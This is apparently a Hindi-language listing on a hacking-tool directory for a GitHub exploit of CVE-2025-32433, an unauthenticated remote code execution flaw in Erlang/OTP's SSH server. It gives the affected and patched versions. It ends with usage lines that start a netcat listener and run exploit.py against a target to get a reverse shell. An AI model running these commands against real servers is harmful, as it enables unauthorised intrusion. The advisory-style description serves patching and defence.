Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/mrdreamreal/cve-2025-32433
Payload GenerationVulnerability AnalysisExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubmrdreamreal/cve-2025-32433

CVE-2025-32433

CVE-2025-32433 Summary and Attack Overview

रिपॉजिटरी देखें
21 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-32433

CVE-2025-32433 सारांश और हमला अवलोकन

CVE-2025-32433 एक महत्वपूर्ण बिना प्रमाणीकरण के रिमोट कोड निष्पादन (RCE) भेद्यता है, जो Erlang/OTP SSH सर्वर में पाई गई है, जिसे 16 अप्रैल 2025 को प्रकट किया गया। Erlang/OTP SSH एक लाइब्रेरी है जिसका उपयोग विभिन्न वितरित और दूरसंचार अनुप्रयोगों में किया जाता है। यह दोष SSH प्रोटोकॉल संदेशों के अनुचित प्रबंधन से उत्पन्न होता है: सर्वर सामान्य प्रमाणीकरण अनुक्रम को लागू करने में विफल रहता है, जिससे हमलावर प्रमाणीकरण से पहले विशेष रूप से तैयार SSH संदेश भेज सकता है। ऐसा करके, हमलावर सर्वर पर मनमाना Erlang कोड इंजेक्ट और निष्पादित कर सकता है​ nvd.nist.gov ​ offsec.com । व्यावहारिक रूप में, इसका अर्थ है कि एक हमलावर जिसके पास कमजोर Erlang/OTP SSH सर्वर (अक्सर रूट के रूप में चल रहा) तक नेटवर्क पहुंच है, वह बिना किसी क्रेडेंशियल के रिवर्स शेल शुरू कर सकता है या कमांड निष्पादित कर सकता है, जिससे पूर्ण सिस्टम समझौता हो सकता है​ nvd.nist.gov ​ offsec.com । इस भेद्यता को CVSS 10.0 (अधिकतम गंभीरता) सौंपा गया है​ offsec.com ।

प्रभावित संस्करण OTP-27.3.3, OTP-26.2.5.11, या OTP-25.3.2.20 (पैच किए गए संस्करण) से नीचे के सभी Erlang/OTP रिलीज़ हैं​ nvd.nist.gov ​ offsec.com । प्रभावित सिस्टम में अक्सर Linux सर्वर या उपकरण शामिल होते हैं जो Erlang-आधारित SSH डेमॉन चला रहे हैं (OpenSSH से भ्रमित न हों)। महत्वपूर्ण बात यह है कि Linux/BSD पर डिफ़ॉल्ट OpenSSH सर्वर कमजोर नहीं हैं​ offsec.com । उपयोगकर्ताओं को मान लेना चाहिए कि कोई भी उजागर Erlang/OTP SSH सर्वर प्रभावित है, और तुरंत आधिकारिक पैच लागू करें या SSH सेवा को अक्षम करें।

हमला SSH कनेक्शन शुरू करके और फिर SSH संदेशों के अनुक्रम को गलत क्रम में भेजकर काम करता है। :

उपयोग:

sudo chmod +x exploit.py

nc -nvlp

python3 exploit.py -t -p 22 --lhost --lport

उदाहरण:

nc -nvlp 5555

python3 exploit.py -t 10.10.22.111 -p 22 --lhost 10.12.33.111 --lport 55555

टूल डाउनलोड करें